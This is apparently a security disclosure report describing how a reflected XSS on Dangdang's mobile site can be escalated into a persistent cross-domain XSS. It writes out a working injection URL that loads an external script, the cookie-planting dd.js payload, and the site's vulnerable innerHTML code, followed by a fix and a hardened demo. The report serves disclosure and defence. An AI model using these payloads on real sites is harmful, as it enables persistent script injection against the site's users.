Summary:

1. A reflected XSS on a second- or third-level domain is pretty weak on its own, isn't it?
2. Can a reflected XSS be turned into something more? (Think of tricks like changing the User-Agent string, you know the drill.)

1 + 2 = stored XSS across every Dangdang domain. Just for fun ~~

Detailed description:

1. After logging in to Dangdang, the user's nickname and the number of items in the shopping cart shown at the top of every page are read out of the COOKIE by JavaScript and written into the page. A forged cookie therefore becomes a stored XSS that fires on almost every domain, and it keeps working whether the user logs out or never logs in at all, because the cart count in the COOKIE is not touched. In this example the forged cookie is valid until January 1, 2020; the reader can adjust that to taste.

2. Find any reflected XSS on the mobile site (m.dangdang.com) and use it to load a script that rewrites the cart-count cookie:

http://m.dangdang.com/touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22

dd.js:

    // The cookie value is the %u-escaped form of <img src=1 onerror=alert(1)>.
    // domain=dangdang.com makes it apply to every subdomain; it expires on January 1, 2020.
    document.cookie = "cart_items_count=%u003c%u0069%u006d%u0067%u0020%u0073%u0072%u0063%u003d%u0031%u0020%u006f%u006e%u0065%u0072%u0072%u006f%u0072%u003d%u0061%u006c%u0065%u0072%u0074%u0028%u0031%u0029%u003e; domain=dangdang.com; path=/; expires=Wed, 01 Jan 2020 00:00:00 GMT";
    location.href = "http://www.dangdang.com";

Where Dangdang's JavaScript parses the COOKIE (http://www.dangdang.com/Found/pagetop_2012.js):

    if (usernick == "") {
        xinshou = "<a name=\"dl\" href=\"java" + "scr" + "ipt:pageTopLogIn();\" target=\"_self\" class=\"login_link\">Log in</a>" +
                  "<a name=\"zc\" href=\"java" + "scr" + "ipt:pageTopRegist();\" target=\"_self\" class=\"login_link\">Free registration</a>";
    } else {
        chakanlk = "[<a name=\"tc\" href=\"java" + "scr" + "ipt:PageTopSignOut();\" target=\"_self\">Log out</a>]";
        xinshou = "";
        var cartItemsCount = GetCookie_one("cart_items_count", "");
        if (cartItemsCount != null && cartItemsCount.length > 0 && cartItemsCount != "undefined") {
            var cic = document.getElementById("cart_items_count");
            if (cic != '') {
                // The value taken from the COOKIE is written straight into the page, which is the XSS.
                cic.innerHTML = "(" + cartItemsCount + ")";
            }
        }
    }
Video demo ~~
Password: ddxss

Solution:

cic.innerHTML = "(" + cartItemsCount + ")"; and the other places that read values from the cookie should filter them again before output, or should not take them from the cookie at all.
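The sink above can be reproduced outside the browser. The following is an added example, not code from Dangdang or from the original report: it builds the %u-escaped payload the way dd.js plants it, models the cookie-to-innerHTML path with a small cookie reader (readCookie, a stand-in for GetCookie_one whose real implementation the page does not show; the %uXXXX decoding via unescape is an assumption), and places a hardened version next to the vulnerable one. The cookie string is constructed for the demo.

```javascript
// Added example (not Dangdang's code). Runs under Node; no DOM required.
// Helper names readCookie, toPercentU, renderCartCountVulnerable and
// renderCartCountSafe are assumptions for this demo, not the site's helpers.

// Build the %uXXXX form of a string, as the dd.js cookie value is encoded.
function toPercentU(s) {
  return Array.from(s, ch => "%u" + ch.charCodeAt(0).toString(16).padStart(4, "0")).join("");
}

// The forged cart_items_count value: <img src=1 onerror=alert(1)> in %u escapes.
const FORGED_VALUE =
  "%u003c%u0069%u006d%u0067%u0020%u0073%u0072%u0063%u003d%u0031%u0020%u006f%u006e%u0065" +
  "%u0072%u0072%u006f%u0072%u003d%u0061%u006c%u0065%u0072%u0074%u0028%u0031%u0029%u003e";

// Constructed document.cookie string for a logged-in victim carrying the forged value.
const FORGED_COOKIE = "usernick=tester; cart_items_count=" + FORGED_VALUE;

// Stand-in for GetCookie_one: split on "; ", take the named value, unescape it.
// Assumption: the site helper decodes %uXXXX (unescape does), which the payload relies on.
function readCookie(cookieString, name, fallback) {
  for (const part of cookieString.split("; ")) {
    const eq = part.indexOf("=");
    if (eq > 0 && part.slice(0, eq) === name) return unescape(part.slice(eq + 1));
  }
  return fallback;
}

// Vulnerable pattern from pagetop_2012.js: the cookie value goes into innerHTML unchanged.
// Returns the HTML string that cic.innerHTML would receive.
function renderCartCountVulnerable(cookieString) {
  const count = readCookie(cookieString, "cart_items_count", "");
  if (count == null || count.length === 0 || count === "undefined") return "";
  return "(" + count + ")";
}

// Hardened form: a cart count is a small non-negative integer, so accept only that
// and drop everything else. Writing with textContent instead of innerHTML would also
// stop markup execution, but validating the type is the tighter fix.
function renderCartCountSafe(cookieString) {
  const raw = readCookie(cookieString, "cart_items_count", "");
  if (!/^\d{1,6}$/.test(raw)) return "";
  return "(" + parseInt(raw, 10) + ")";
}

// Stand-alone run: show the decoded payload reaching the sink versus being rejected.
console.log("payload matches:", toPercentU("<img src=1 onerror=alert(1)>") === FORGED_VALUE);
console.log("vulnerable:", renderCartCountVulnerable(FORGED_COOKIE));
console.log("hardened:  ", JSON.stringify(renderCartCountSafe(FORGED_COOKIE)));
console.log("hardened, honest value:", renderCartCountSafe("cart_items_count=3"));
```

Because the forged cookie is set with domain=dangdang.com, every host that ships this top-bar script reads the same value, which is why a single reflected XSS on the mobile site turns into a stored XSS on the main site.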